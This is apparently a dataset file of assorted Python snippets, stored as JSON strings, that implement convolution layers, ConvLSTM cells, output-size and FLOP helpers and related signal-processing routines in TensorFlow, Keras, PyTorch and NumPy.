conv_op(args[0], W_cx, strides, padding=\"SAME\")\n c_h = conv_op(args[1], W_ch, strides, padding=\"SAME\")\n\n # forget gate\n\n f_x = conv_op(args[0], W_fx, strides, padding=\"SAME\")\n f_h = conv_op(args[1], W_fh, strides, padding=\"SAME\")\n\n # output gate\n\n o_x = conv_op(args[0], W_ox, strides, padding=\"SAME\")\n o_h = conv_op(args[1], W_oh, strides, padding=\"SAME\")\n\n # sum up results\n \n res_x = array_ops.concat(axis=shape_length - 1, values=[i_x, c_x, f_x, o_x])\n res_h = array_ops.concat(axis=shape_length - 1, values=[i_h, c_h, f_h, o_h])\n res = tf.add(res_x, res_h)\n\n elif convtype == 'separable':\n # Get kernels\n\n kernel_depth = vs.get_variable(\"kernel_depth\", filter_size + [total_arg_size_depth, 4*channel_multiplier],\n dtype=dtype)\n print('kernel_depth: ', filter_size + [total_arg_size_depth, 4*channel_multiplier])\n kernel_sep = vs.get_variable(\"kernel_sep\", [1, 1, total_arg_size_depth, num_features], dtype=dtype)\n print('kernel_sep: ', [1, 1, total_arg_size_depth, num_features])\n\n W_ix = kernel_depth[..., 0:c_i, 0:1*channel_multiplier]\n W_ih = kernel_depth[..., c_i:2*c_i, 0:1*channel_multiplier]\n W_cx = kernel_depth[..., 0:c_i, 1*channel_multiplier:2*channel_multiplier]\n W_ch = kernel_depth[..., c_i:2*c_i, 1*channel_multiplier:2*channel_multiplier]\n W_fx = kernel_depth[..., 0:c_i, 2*channel_multiplier:3*channel_multiplier]\n W_fh = kernel_depth[..., c_i:2*c_i, 2*channel_multiplier:3*channel_multiplier]\n W_ox = kernel_depth[..., 0:c_i, 3*channel_multiplier:4*channel_multiplier]\n W_oh = kernel_depth[..., c_i:2*c_i, 3*channel_multiplier:4*channel_multiplier]\n\n Wsep_ix = kernel_sep[..., 0:c_i, 0:1*c_o]\n Wsep_ih = kernel_sep[..., c_i:2*c_i, 0:1*c_o]\n Wsep_cx = kernel_sep[..., 0:c_i, 1*c_o:2*c_o]\n Wsep_ch = kernel_sep[..., c_i:2*c_i, 1*c_o:2*c_o]\n Wsep_fx = kernel_sep[..., 0:c_i, 2*c_o:3*c_o]\n Wsep_fh = kernel_sep[..., c_i:2*c_i, 2*c_o:3*c_o]\n Wsep_ox = kernel_sep[..., 0:c_i, 3*c_o:4*c_o]\n Wsep_oh = kernel_sep[..., c_i:2*c_i, 3*c_o:4*c_o]\n\n # input gate\n\n i_x = conv_op(args[0], W_ix, Wsep_ix, strides, padding=\"SAME\")\n i_h = conv_op(args[1], W_ih, Wsep_ih, strides, padding=\"SAME\")\n\n # new input (= intermediate step for new cell state)\n\n c_x = conv_op(args[0], W_cx, Wsep_cx, strides, padding=\"SAME\")\n c_h = conv_op(args[1], W_ch, Wsep_ch, strides, padding=\"SAME\")\n\n # forget gate\n\n f_x = conv_op(args[0], W_fx, Wsep_fx, strides, padding=\"SAME\")\n f_h = conv_op(args[1], W_fh, Wsep_fh, strides, padding=\"SAME\")\n\n # output gate\n\n o_x = conv_op(args[0], W_ox, Wsep_ox, strides, padding=\"SAME\")\n o_h = conv_op(args[1], W_oh, Wsep_oh, strides, padding=\"SAME\")\n\n # sum up results\n \n res_x = array_ops.concat(axis=shape_length - 1, values=[i_x, c_x, f_x, o_x])\n res_h = array_ops.concat(axis=shape_length - 1, values=[i_h, c_h, f_h, o_h])\n res = tf.add(res_x, res_h)\n\n else: # normal CONV\n # Get kernel\n\n kernel = vs.get_variable(\"kernel\", filter_size + [total_arg_size_depth, 4*c_o], dtype=dtype)\n print('kernel: ', filter_size + [total_arg_size_depth, 4*c_o])\n\n W_ix = kernel[..., 0:c_i, 0:1*c_o]\n W_ih = kernel[..., c_i:2*c_i, 0:1*c_o]\n W_cx = kernel[..., 0:c_i, 1*c_o:2*c_o]\n W_ch = kernel[..., c_i:2*c_i, 1*c_o:2*c_o]\n W_fx = kernel[..., 0:c_i, 2*c_o:3*c_o]\n W_fh = kernel[..., c_i:2*c_i, 2*c_o:3*c_o]\n W_ox = kernel[..., 0:c_i, 3*c_o:4*c_o]\n W_oh = kernel[..., c_i:2*c_i, 3*c_o:4*c_o]\n\n # input gate\n\n i_x = conv_op(args[0], W_ix, strides, padding=\"SAME\")\n i_h = conv_op(args[1], W_ih, strides, padding=\"SAME\")\n\n # new input (= intermediate step for new cell state)\n\n c_x = conv_op(args[0], W_cx, strides, padding=\"SAME\")\n c_h = conv_op(args[1], W_ch, strides, padding=\"SAME\")\n\n # forget gate\n\n f_x = conv_op(args[0], W_fx, strides, padding=\"SAME\")\n f_h = conv_op(args[1], W_fh, strides, padding=\"SAME\")\n\n # output gate\n\n o_x = conv_op(args[0], W_ox, strides, padding=\"SAME\")\n o_h = conv_op(args[1], W_oh, strides, padding=\"SAME\")\n\n # sum up results\n \n res_x = array_ops.concat(axis=shape_length - 1, values=[i_x, c_x, f_x, o_x])\n res_h = array_ops.concat(axis=shape_length - 1, values=[i_h, c_h, f_h, o_h])\n res = tf.add(res_x, res_h)\n \n if not bias:\n return res\n bias_term = vs.get_variable(\"biases\", [num_features], dtype=dtype,\n initializer=init_ops.constant_initializer(bias_start, dtype=dtype))\n return res + bias_term", "def complexity_conv2d(cx, w_in, w_out, k, stride, padding, groups=1, bias=False):\n h, w, flops, params, acts = cx[\"h\"], cx[\"w\"], cx[\"flops\"], cx[\"params\"], cx[\"acts\"]\n h = (h + 2 * padding - k) // stride + 1\n w = (w + 2 * padding - k) // stride + 1\n flops += k * k * w_in * w_out * h * w // groups\n params += k * k * w_in * w_out // groups\n flops += w_out if bias else 0\n params += w_out if bias else 0\n acts += w_out * h * w\n return {\"h\": h, \"w\": w, \"flops\": flops, \"params\": params, \"acts\": acts}", "def diffnc(X, dt):\n [traj_length, D] = X.shape\n XX = np.zeros((traj_length + 2, D))\n for d in range(D):\n XX[:, d] = np.convolve(X[:, d], np.array([1, 0, -1]) / 2.0 / dt)\n\n X = XX[1:traj_length + 1, :]\n X[0, :] = X[1, :]\n X[traj_length - 1, :] = X[traj_length - 2, :]\n\n return X", "def epochs_for_cycles(self, cycles: int) -> int:\n cnt = self.warmup\n n = self.n0\n for _ in range(cycles):\n cnt += n\n n = int(round(n * self.length_scale))\n return cnt", "def get_iterations(train_length: int, batch_size: int, epochs: int) -> int:\n return train_length // batch_size * epochs", "def get_conv1d_output_size(input_size, kernel_size, stride):\n return ((input_size - kernel_size)//stride) + 1", "def get_conv1d_output_size(input_size, kernel_size, stride):\n return ((input_size - kernel_size)//stride) + 1", "def convolve(img, fourier_kernel):\n return np.fft.ifftshift(np.fft.irfft2(np.fft.rfft2(img) * fourier_kernel))", "def compute(self, node, input_vals):\r\n #assert len(input_vals) == 2\r\n #start = time.time()\r\n strides = node.const_attr\r\n ish = list(input_vals[0].shape)\r\n fsh = list(input_vals[1].shape)\r\n filter = input_vals[1].astype(float32)\r\n input = np.zeros((ish[0],ish[1]+fsh[0]-1,ish[2]+fsh[1]-1,ish[3])).astype(float32)\r\n input[:,fsh[0]//2:fsh[0]//2+ish[1]:1,fsh[1]//2:fsh[1]//2+ish[2]:1,:]+=input_vals[0].astype(float32)\r\n ish = list(input.shape)\r\n output = np.zeros([ish[0],(ish[1]-fsh[0])//strides[1]+1,(ish[2]-fsh[1])//strides[2]+1,fsh[3]]).astype(float32)\r\n osh = output.shape\r\n\r\n assert c_kernel.conv2d_c(get_pointer(input), ish[0],ish[1],ish[2],ish[3],get_pointer(filter),fsh[0],fsh[1],fsh[2],fsh[3],strides[0],strides[1],strides[2],strides[3],get_pointer(output), osh[0],osh[1],osh[2],osh[3])==0\r\n #print(\"conv2d\") \r\n #end = time.time()\r\n\r\n #print(end - start) \r\n return output\r\n \r\n '''\r\n rm = range(osh[0])\r\n ri = range(osh[1])\r\n rj = range(osh[2])\r\n rdi = range(fsh[0])\r\n rdj = range(fsh[1])\r\n for m in rm:\r\n for i in ri:\r\n for j in rj:\r\n for di in rdi:\r\n for dj in rdj:\r\n print(input[m,strides[1]*i+di,strides[2]*j+dj,:])\r\n print(filter[di,dj,:,:])\r\n t = np.dot(\r\n input[m,strides[1]*i+di,strides[2]*j+dj,:],\r\n filter[di,dj,:,:]\r\n )\r\n output[m,i,j] = np.sum(\r\n [\r\n t,\r\n output[m,i,j]\r\n ],\r\n axis=0\r\n )\r\n #print(\"type(output)\")\r\n #print(type(output))\r\n return output\r\n '''", "def time_conv_block(model, nb_layers, nb_filters):\n\n for _ in range(nb_layers):\n model = time_conv_layer(model, nb_filters)\n model = MaxPooling1D()(model)\n model = Dropout(0.1)(model)\n return model", "def _conv_block( inputs, filters, kernel, strides, nl):\n channel_axis = 1 if K.image_data_format() == 'channels_first' else -1\n x = Conv2D(filters, kernel, padding='same', strides=strides)(inputs)\n x = BatchNormalization(axis=channel_axis)(x)\n return _return_activation(x, nl)", "def call(self, inputs, state):\n dtype = inputs.dtype\n input_size = inputs.get_shape().with_rank(4)[3]\n if input_size.value is None:\n raise ValueError('Could not infer size from inputs.get_shape()[-1]')\n\n c_prev, m_prev = state\n inputs = tf.concat([inputs, m_prev], axis=-1)\n\n if not self._w_conv:\n scope = tf.get_variable_scope()\n with tf.variable_scope(scope, initializer=self._initializer):\n kernel_shape = self._kernel + [inputs.shape[-1].value, 4 * self._depth]\n self._w_conv = tf.get_variable('w_conv', shape=kernel_shape, dtype=dtype)\n\n # i = input_gate, j = new_input, f = forget_gate, o = ouput_gate\n conv = tf.nn.conv2d(inputs, self._w_conv, (1, 1, 1, 1), 'SAME')\n i, j, f, o = tf.split(conv, 4, axis=-1)\n\n # Diagonal connections\n if self._use_peepholes and not self._w_f_diag:\n scope = tf.get_variable_scope()\n with tf.variable_scope(scope, initializer=self._initializer):\n self._w_f_diag = tf.get_variable('w_f_diag', c_prev.shape[1:], dtype=dtype)\n self._w_i_diag = tf.get_variable('w_i_diag', c_prev.shape[1:], dtype=dtype)\n self._w_o_diag = tf.get_variable('w_o_diag', c_prev.shape[1:], dtype=dtype)\n\n if self._use_peepholes:\n f = f + self._w_f_diag * c_prev\n i = i + self._w_i_diag * c_prev\n if self._normalize is not None:\n f = self._normalize(f)\n i = self._normalize(i)\n j = self._normalize(j)\n\n j = self._activation(j)\n\n if self._dropout is not None:\n j = tf.nn.dropout(j, self._dropout)\n\n c = tf.nn.sigmoid(f + self._forget_bias) * c_prev + tf.nn.sigmoid(i) * j\n\n if self._cell_clip is not None:\n # pylint: disable=invalid-unary-operand-type\n c = tf.clip_by_value(c, -self._cell_clip, self._cell_clip)\n # pylint: enable=invalid-unary-operand-type\n if self._use_peepholes:\n o = o + self._w_o_diag * c\n if self._normalize is not None:\n o = self._normalize(o)\n c = self._normalize(c)\n\n m = tf.nn.sigmoid(o) * self._activation(c)\n\n new_state = tf.nn.rnn_cell.LSTMStateTuple(c, m)\n return m, new_state", "def Get_Convolution(label, radius, feature_dict, pad = True, convert_length = 0.2204315, verbose = False, \n path = '', filename = '', meta = None):\n ## Make convolution at specified radius\n r = round(radius / convert_length)\n num_class = len(feature_dict)\n ## Create circular filter window\n x = np.arange(0, 2*r)\n y = np.arange(0, 2*r)\n mask = (x[np.newaxis,:]-r)**2 + (y[:,np.newaxis]-r)**2 < r**2 \n mask = mask[:,:,np.newaxis, np.newaxis]\n mask_tensor = tf.constant(mask, tf.float32)\n\n expanded_label = Expand_Mask(label, feature_dict)\n lab_shape = expanded_label.shape\n all_lab = np.zeros((lab_shape[0] - mask.shape[0] + 1, lab_shape[1] - mask.shape[1] + 1, num_class))\n for val in range(num_class): \n ohe_layer = expanded_label[:,:,val]\n ohe_tensor = tf.constant(ohe_layer[np.newaxis, :, :, np.newaxis], tf.float32)\n tensor_res = tf.nn.convolution(ohe_tensor, mask_tensor, padding='VALID') \n all_lab[:,:,val] = tensor_res.numpy()[0,:,:,0]\n if verbose:\n print('Finished: ' + str(val))\n \n if pad:\n array_shape = label.shape\n # up-down padding\n tot_pw_ud = (array_shape[0] - all_lab.shape[0])/2\n pw_up = int(np.ceil(tot_pw_ud))\n pw_down = int(np.floor(tot_pw_ud))\n # left-right padding\n tot_pw_lr = (array_shape[1] - all_lab.shape[1])/2\n pw_left = int(np.ceil(tot_pw_lr))\n pw_right = int(np.floor(tot_pw_lr))\n all_lab_pad = np.pad(all_lab, pad_width = ((pw_down, pw_up), (pw_left, pw_right), (0,0)), \n mode = 'constant', constant_values = 255)\n \n if filename !='':\n try:\n if path == '':\n path = 'Predictions'\n os.makedirs(path)\n except OSError as error: \n print('') \n \n meta.update(count = num_class, nodata = 255, compress = 'deflate', predictor = 2)\n \n # Write raster label to file\n tif_lab_pad = np.moveaxis(all_lab_pad,-1,0)\n with rasterio.open(path + '/' + filename + '.tif', 'w', **meta) as src:\n src.write(tif_lab_pad) \n return all_lab_pad", "def forward(\n self, input: torch.Tensor, input_lengths: torch.Tensor\n ) -> Tuple[torch.Tensor, torch.Tensor]:\n input_size = input.size()\n B = input_size[0]\n T = input_size[1]\n C = self.channels\n D = self.win_length\n # (B, T, C) --> (T, B, C)\n continuous = input.view(B, T, C).permute(1, 0, 2)\n windowed = continuous.unfold(0, D, self.hop_length)\n # (T, B, C, D) --> (B, T, C, D)\n output = windowed.permute(1, 0, 2, 3).contiguous()\n # After unfold(), windowed lengths change:\n output_lengths = (\n torch.div(\n input_lengths - self.win_length, self.hop_length, rounding_mode=\"trunc\"\n )\n + 1\n )\n return output, output_lengths", "def conv1d_reduce_sum(x, input_length, padding, stride):\n # Sum over the output channels.\n lam_sum = tf.reduce_sum(x, axis=3)\n\n num_classes = x.shape[0].value\n batch_size = tf.shape(x)[1]\n kernel_length = x.shape[4].value\n input_channels = x.shape[5].value\n\n # Temporarily combine the (num_classes, batch_size, in_layer_channels) dims\n # while applying a transpose convolution.\n # Also use (kernel_length) as the channels\n # as we'll apply the transpose convolution to each kernel point separately.\n lam_squeezed = tf.transpose(lam_sum, perm=[0, 1, 4, 2, 3])\n lam_squeezed = tf.reshape(lam_squeezed, shape=(\n [num_classes * batch_size * input_channels] +\n x.shape[2:3].as_list() +\n [kernel_length]))\n\n # De-convolve each elementary (i.e. one-hot) filter with the corresponding\n # slice of lambda.\n diagonal_kernel = tf.reshape(\n tf.eye(kernel_length, dtype=x.dtype),\n shape=[kernel_length, 1, kernel_length])\n lam_deconv = tf.nn.conv1d_transpose(\n lam_squeezed,\n diagonal_kernel,\n output_shape=([num_classes * batch_size * input_channels] +\n [input_length, 1]),\n padding=padding,\n strides=stride)\n\n # The resulting de-convolution has shape\n # (num_classes*batch_size*in_layer_channels,\n # in_layer_length, 1).\n # Make it match mu_in.\n result = tf.reshape(lam_deconv, shape=(\n [num_classes, batch_size, input_channels] +\n lam_deconv.shape[1:2].as_list()))\n return tf.transpose(result, perm=[0, 1, 3, 2])", "def apply_ccms(images, ccms):\n images.shape.assert_has_rank(4)\n images = images[:, :, :, tf.newaxis, :]\n ccms = ccms[:, tf.newaxis, tf.newaxis, :, :]\n return tf.reduce_sum(images * ccms, axis=-1)", "def conv1d(data_arr, kernel_arr, tarr_len, discrete_kernel_shape, mode='valid'):\n\n assert(data_arr.ndim == 2)\n output_shape = discrete_kernel_shape[1:]\n if (kernel_arr.ndim == 2):\n # Algorithm assumes a \"to\" axis on the kernel. Add it.\n kernel_arr = add_axes(kernel_arr, 1, 'before last')\n discrete_kernel_shape = discrete_kernel_shape[0:1] + (1,) + discrete_kernel_shape[1:2]\n else:\n check(kernel_arr.ndim == 3)\n\n # Convolutions leave the time component on the inside, but we want it on the outside\n # So we do the iterations in reverse order, and flip the result with transpose()\n # The result is indexed as [tidx][to idx][from idx]\n if cf.use_theano:\n # We use slices from_idx:from_idx+1 because conv2d expects 2D objects\n # We then index [:,0] to remove the spurious dimension\n result = T.stack(\n [ T.stack(\n [ T.signal.conv.conv2d(data_arr[:, from_idx:from_idx+1 ],\n kernel_arr[:, to_idx, from_idx:from_idx+1 ],\n image_shape = (tarr_len, 1),\n filter_shape = (discrete_kernel_shape[0], 1),\n border_mode = mode)[:,0]\n for to_idx in np.arange(discrete_kernel_shape[1]) ] )\n for from_idx in np.arange(discrete_kernel_shape[2]) ] ).T\n else:\n assert(discrete_kernel_shape == kernel_arr.shape)\n assert(tarr_len == data_arr.shape[0])\n result = np.stack(\n [ np.stack(\n [ scipy.signal.convolve(data_arr[:, from_idx ],\n kernel_arr[:, to_idx, from_idx ],\n mode=mode)\n for to_idx in np.arange(kernel_arr.shape[1]) ] )\n for from_idx in np.arange(kernel_arr.shape[2]) ] ).T\n\n return result.reshape((tarr_len - discrete_kernel_shape[0] + 1,) + output_shape)", "def concentration(self, time: float) -> _VectorisedFloat:\n return (self._normed_concentration_cached(time) * \n self.normalization_factor())", "def convolveUsingTime(filename, out, altitude=10000, dt_mes=1e-9, height=8, firstOrder=False):\n\n # b = const.LIGHT_SPEED * dt_mes # width of bin in terms of length [m]\n # num_bin = int(np.ceil(height / b) * 2)\n # bins = np.linspace(altitude * 2 - b * (num_bin // 2), altitude * 2 + b * (num_bin // 2), num_bin, endpoint=False)\n bins = []\n bins.append(0)\n time = dt_mes * 1e9\n while time * C / 1e9 <= height:\n bins.append(time)\n bins.append(-time)\n time += dt_mes * 1e9\n bins.sort()\n num_bin = len(bins)\n bins = np.array(bins)\n times = np.array(bins)\n bins = bins + 2 * altitude / C * 1e9 # - altitude * 1e9 / const.LIGHT_SPEED % (dt_mes * 1e9 / 2)\n print('convolveUsingTime')\n # print(bins)\n\n f = np.zeros(num_bin) # contain the accumulated energy input\n\n # read file\n data = np.loadtxt(filename)\n if len(data.shape) == 1:\n data = np.array([data])\n\n length = data[:, INDEX_OF_TIME] / C * 1e9\n energy = data[:, INDEX_OF_ENERGY]\n if firstOrder:\n length = length[data[:, INDEX_OF_DEPTH] == 0]\n energy = energy[data[:, INDEX_OF_DEPTH] == 0]\n print('convolveUsingTime 1st energy', energy.sum())\n # print('convolveUsingTime')\n # print(length)\n\n d = np.array([length, energy]).T\n\n # accumulate the energy, assign to variable `f`\n l = 2 * (altitude - height) / C * 1e9\n r = 2 * (altitude + height) / C * 1e9\n for i in d:\n if not l <= i[0] <= r:\n continue\n # idx = np.searchsorted(bins, i[0]) - 1 # lower bound better\n # idx, ansr = searchRange(bins, i[0])\n idx = lower_bound(bins, i[0]) - 1\n f[idx] += i[1]\n\n # convolve\n n = 5 # hard code\n x = np.linspace(-3, 3, 2 * n + 1)\n pulse = np.exp(-x * x / 2)\n pulse = pulse / np.sum(pulse)\n\n pulse = np.array([0.003088973, 0.01469372, 0.04942357, 0.1175497, 0.1976943, 0.2350995, 0.1976943, 0.1175497, 0.04942357, 0.01469372, 0.003088973])\n\n res = np.convolve(f, pulse, 'same')\n # ans = np.array([bins - 2 * altitude / const.LIGHT_SPEED * 1e9 + 0.5, res]).T\n ans = np.array([times, res]).T\n\n [dirname, name] = os.path.split(out)\n\n np.savetxt(dirname + '/accum/accum-' + name, np.array([bins - 2 * altitude / const.LIGHT_SPEED * 1e9 + 0.5, f]).T)\n np.savetxt(dirname + '/accum/accum-' + name, np.array([times, f]).T)\n np.savetxt(out, ans)\n return ans", "def convolve(x, attn):\n stacked = torch.stack([pad_shift(x, i) for\n i in range(attn.shape[2])], dim=-1)\n return torch.sum(attn.unsqueeze(2) * stacked, dim=-1)", "def _conv_block(inputs, filters, kernel=(3, 3), strides=(1, 1), alpha=1.0, nl='RE'):\n channel_axis = 1 if K.image_data_format() == 'channels_first' else -1\n filters = int(filters * alpha)\n x = KL.Conv2D(filters, kernel, padding='same', use_bias=False, strides=strides)(inputs)\n x = KL.BatchNormalization(axis=channel_axis)(x)\n return _return_activation(x, nl=nl)", "def convnet_layers( inputs, widths, mode ):\n\n training = (mode == \"train\")\n \n with tf.variable_scope( \"convnet\" ): # h,w\n \n #print(inputs.shape)\n x = conv_layer( inputs, layer_params[0], training ) \n #print(x.shape)\n x = conv_layer( x, layer_params[1], training ) \n #print(x.shape)\n x = pool_layer( x, 2, 'valid', 'pool2' )\n #print(x.shape)\n x = conv_layer( x, layer_params[2], training ) \n x = conv_layer( x, layer_params[3], training )\n #print(x.shape)\n x = pool_layer( x, 2, 'valid', 'pool4' )\n #print(x.shape)\n x = conv_layer( x, layer_params[4], training ) \n x = conv_layer( x, layer_params[5], training )\n #print(x.shape)\n x = pool_layer( x, 2, 'valid', 'pool6') \n #print(x.shape)\n x = conv_layer( x, layer_params[6], training ) \n x = conv_layer( x, layer_params[7], training )\n \n x = tf.layers.max_pooling2d( x, [2, 1], [2, 1], \n padding='valid', \n name='pool8' ) \n\n #print(x.shape)\n\n # squeeze row dim\n x = tf.squeeze( x, axis=1, name='features' )\n\n #print(x.shape)\n\n sequence_length = get_sequence_lengths( widths ) \n\n return x, sequence_length", "def calcfeat_delta_delta(signal, samplerate=16000, win_length=0.025, win_step=0.01, filters_num=26, NFFT=512,\n\t\t\t\t\t\t low_freq=0, high_freq=None, pre_emphasis_coeff=0.97, cep_lifter=22, appendEnergy=True,\n\t\t\t\t\t\t mode='mfcc', feature_len=13):\n\tfilters_num = 2 * feature_len\n\tfeat = calcMFCC(signal, samplerate, win_length, win_step, feature_len, filters_num, NFFT, low_freq, high_freq,\n\t\t\t\t\tpre_emphasis_coeff, cep_lifter, appendEnergy, mode=mode) # 首先获取13个一般MFCC系数\n\tfeat_delta = delta(feat)\n\tfeat_delta_delta = delta(feat_delta)\n\n\tresult = numpy.concatenate((feat, feat_delta, feat_delta_delta), axis=1)\n\treturn result", "def get_length(data):\n return np.array([len(conv) for conv in data]).reshape(-1, 1)", "def schedule_conv2d_NCHWc(num_filter, kernel_size, stride, padding, outs):\n s = tvm.create_schedule([x.op for x in outs])\n\n def traverse(op):\n \"\"\"Traverse operators from computation graph\"\"\"\n # inline all one-to-one-mapping operators except the last stage (output)\n if tag.is_broadcast(op.tag):\n if op not in s.outputs:\n s[op].compute_inline()\n for tensor in op.input_tensors:\n if tensor.op.input_tensors:\n traverse(tensor.op)\n\n if 'conv2d_NCHWc' in op.tag:\n conv_out = op.output(0)\n kernel = conv_out.op.input_tensors[1]\n data_vec = conv_out.op.input_tensors[0]\n data = data_vec.op.input_tensors[0] \\\n if isinstance(data_vec.op, tvm.tensor.ComputeOp) and \"pad\" not in data_vec.op.tag \\\n else data_vec\n if isinstance(data.op, tvm.tensor.ComputeOp) and \"pad\" in data.op.tag:\n data_pad = data\n data = data_pad.op.input_tensors[0]\n\n n, ic_chunk, h, w, ic_block = [x.value for x in data.shape]\n ic = ic_chunk * ic_block\n original_data = tvm.placeholder((n, ic, h, w), dtype=conv_out.dtype)\n\n kh, kw = kernel_size\n original_kernel = tvm.placeholder((num_filter, ic, kh, kw), dtype=conv_out.dtype)\n\n wkl = _get_workload(original_data, original_kernel, stride, padding, conv_out.dtype)\n sch = _get_schedule(wkl)\n _SCH_TO_SCH_FUNC[type(sch)](s, wkl, data_vec,\n kernel, conv_out, outs[0])\n\n traverse(outs[0].op)\n return s", "def conv(self,\n x,\n k_h,\n k_w,\n c_o,\n s_h,\n s_w,\n name,\n relu,\n group=1,\n bias_term=False,\n padding=\"SAME\",\n trainable=True):\n with tf.name_scope(name), tf.variable_scope(name):\n # Get the input channel\n c_i = x.get_shape()[-1]/group\n # Create the weights, with shape [k_h, k_w, c_i, c_o]\n weights = self.make_cpu_variables(\"weights\", [k_h, k_w, c_i, c_o], trainable=trainable)\n # Create a function for convolution calculation\n def conv2d(i, w):\n return tf.nn.conv2d(i, w, [1, s_h, s_w, 1], padding)\n # If we don't need to divide this convolutional layer\n if group == 1:\n outputs = conv2d(x, weights)\n # If we need to divide this convolutional layer\n else:\n # Split the input and weights\n group_inputs = tf.split(x, group, 3, name=\"split_inputs\")\n group_weights = tf.split(weights, group, 3, name=\"split_weights\")\n group_outputs = [conv2d(i, w) for i, w in zip(group_inputs, group_weights)]\n # Concatenate the groups\n outputs = tf.concat(group_outputs, 3)\n if bias_term:\n # Create the biases, with shape [c_o]\n biases = self.make_cpu_variables(\"biases\", [c_o], trainable=trainable)\n # Add the biases\n outputs = tf.nn.bias_add(outputs, biases)\n if relu:\n # Nonlinear process\n outputs = tf.nn.relu(outputs)\n # Return layer's output\n return outputs", "def TCN_V2(\n n_classes, \n feat_dim,\n max_len,\n gap=1,\n dropout=0.0,\n activation=\"relu\"):\n\n ROW_AXIS = 1\n CHANNEL_AXIS = 2\n \n initial_conv_len = 8\n initial_conv_num = 64\n\n config = [ \n [(1,8,64)],\n [(1,8,64)],\n [(1,8,64)],\n [(1,8,64)],\n [(1,8,64)],\n [(2,8,128)],\n [(1,8,128)],\n [(1,8,128)],\n [(1,8,128)],\n [(1,8,128)],\n ]\n\n input = Input(shape=(max_len,feat_dim))\n model = input\n\n model = Convolution1D(initial_conv_num, \n initial_conv_len,\n init=\"he_normal\",\n border_mode=\"same\",\n subsample_length=1)(model)\n\n for depth in range(0,len(config)):\n blocks = []\n for stride,filter_dim,num in config[depth]:\n ## residual block\n bn = BatchNormalization(mode=0, axis=CHANNEL_AXIS)(model)\n relu = Activation(activation)(bn)\n dr = Dropout(dropout)(relu)\n conv = Convolution1D(num, \n filter_dim,\n init=\"he_normal\",\n border_mode=\"same\",\n subsample_length=stride)(dr)\n #dr = Dropout(dropout)(conv)\n\n\n ## potential downsample\n conv_shape = K.int_shape(conv)\n model_shape = K.int_shape(model)\n if conv_shape[CHANNEL_AXIS] != model_shape[CHANNEL_AXIS]:\n model = Convolution1D(num, \n 1,\n init=\"he_normal\",\n border_mode=\"same\",\n subsample_length=2)(model)\n\n ## merge block\n model = merge([model,conv],mode='sum',concat_axis=CHANNEL_AXIS)\n\n ## final bn+relu\n bn = BatchNormalization(mode=0, axis=CHANNEL_AXIS)(model)\n model = Activation(activation)(bn)\n\n\n if gap:\n pool_window_shape = K.int_shape(model)\n gap = AveragePooling1D(pool_window_shape[ROW_AXIS],\n stride=1)(model)\n flatten = Flatten()(gap)\n else:\n flatten = Flatten()(model)\n\n dense = Dense(output_dim=n_classes,\n init=\"he_normal\",\n activation=\"softmax\")(flatten)\n\n model = Model(input=input, output=dense)\n # optimizer = SGD(lr=0.01, momentum=0.9, decay=0.0, nesterov=True) \n # model.compile(loss='categorical_crossentropy', optimizer=optimizer,metrics=['accuracy'])\n return model", "def _build_conv_layer_params(self, input_shape):\n conv_layer_params = []\n if self._conv_type == '3d':\n conv_layer_params.append(\n dict(\n filters=self._filters,\n kernel_size=[self._kernel_size] * 3,\n strides=self._strides,\n dilation_rate=self._rates,\n kernel_initializer=tf_utils.clone_initializer(\n self._kernel_initializer),\n ))\n elif self._conv_type == '2d':\n conv_layer_params.append(\n dict(\n filters=self._filters,\n kernel_size=[1, self._kernel_size, self._kernel_size],\n strides=[1, self._strides[1], self._strides[2]],\n dilation_rate=[1, self._rates[1], self._rates[2]],\n kernel_initializer=tf_utils.clone_initializer(\n self._kernel_initializer),\n ))\n elif self._conv_type == '1+2d':\n channels_in = input_shape[self._channel_axis]\n conv_layer_params.append(\n dict(\n filters=channels_in,\n kernel_size=[self._kernel_size, 1, 1],\n strides=[self._strides[0], 1, 1],\n dilation_rate=[self._rates[0], 1, 1],\n kernel_initializer=tf_utils.clone_initializer(\n self._temporal_conv_initializer),\n ))\n conv_layer_params.append(\n dict(\n filters=self._filters,\n kernel_size=[1, self._kernel_size, self._kernel_size],\n strides=[1, self._strides[1], self._strides[2]],\n dilation_rate=[1, self._rates[1], self._rates[2]],\n kernel_initializer=tf_utils.clone_initializer(\n self._kernel_initializer),\n ))\n elif self._conv_type == '2+1d':\n conv_layer_params.append(\n dict(\n filters=self._filters,\n kernel_size=[1, self._kernel_size, self._kernel_size],\n strides=[1, self._strides[1], self._strides[2]],\n dilation_rate=[1, self._rates[1], self._rates[2]],\n kernel_initializer=tf_utils.clone_initializer(\n self._kernel_initializer),\n ))\n conv_layer_params.append(\n dict(\n filters=self._filters,\n kernel_size=[self._kernel_size, 1, 1],\n strides=[self._strides[0], 1, 1],\n dilation_rate=[self._rates[0], 1, 1],\n kernel_initializer=tf_utils.clone_initializer(\n self._temporal_conv_initializer),\n ))\n elif self._conv_type == '1+1+1d':\n conv_layer_params.append(\n dict(\n filters=self._filters,\n kernel_size=[1, 1, self._kernel_size],\n strides=[1, 1, self._strides[2]],\n dilation_rate=[1, 1, self._rates[2]],\n kernel_initializer=tf_utils.clone_initializer(\n self._kernel_initializer),\n ))\n conv_layer_params.append(\n dict(\n filters=self._filters,\n kernel_size=[1, self._kernel_size, 1],\n strides=[1, self._strides[1], 1],\n dilation_rate=[1, self._rates[1], 1],\n kernel_initializer=tf_utils.clone_initializer(\n self._kernel_initializer),\n ))\n conv_layer_params.append(\n dict(\n filters=self._filters,\n kernel_size=[self._kernel_size, 1, 1],\n strides=[self._strides[0], 1, 1],\n dilation_rate=[self._rates[0], 1, 1],\n kernel_initializer=tf_utils.clone_initializer(\n self._kernel_initializer),\n ))\n else:\n raise ValueError('Unsupported conv_type: {}'.format(self._conv_type))\n return conv_layer_params", "def conv_block(input, filters, phase=phase):\r\n\r\n conv_block = tf.layers.conv2d(\r\n inputs=input,\r\n filters=filters,\r\n kernel_size=3,\r\n padding=\"SAME\",\r\n activation=tf.nn.relu)\r\n\r\n #conv_block = tf.contrib.layers.batch_norm(\r\n # conv_block, \r\n # center=True, scale=True, \r\n # is_training=phase)\r\n\r\n #conv_block = tf.nn.leaky_relu(\r\n # features=conv_block,\r\n # alpha=0.2)\r\n #conv_block = tf.nn.relu(conv_block)\r\n\r\n return conv_block", "def conv(c_in, c_out, k_size, stride=2, pad=1, bn=True):\n layers = []\n layers.append(nn.Conv2d(c_in, c_out, k_size, stride, pad, bias=True)) # bias=False\n if bn:\n layers.append(nn.BatchNorm2d(c_out))\n return nn.Sequential(*layers)", "def 